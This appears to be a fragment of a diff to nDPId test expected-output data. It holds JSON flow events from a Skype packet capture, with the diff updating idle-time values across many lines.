-00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1106,8 +1106,8 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 